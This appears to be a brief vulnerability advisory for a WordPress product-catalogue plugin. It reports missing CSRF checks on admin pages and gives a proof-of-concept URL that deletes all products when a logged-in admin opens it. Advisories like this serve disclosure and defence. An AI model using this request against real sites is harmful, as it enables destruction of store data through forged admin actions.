Description The plugin does not have CSRF checks in some of its admin pages, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as delete all products
Make a logged in admin open the URL below
https://example.com/wp-admin/edit.php?post_type=al_product&page=system.php&delete_all_products&delete_all_products_confirm=1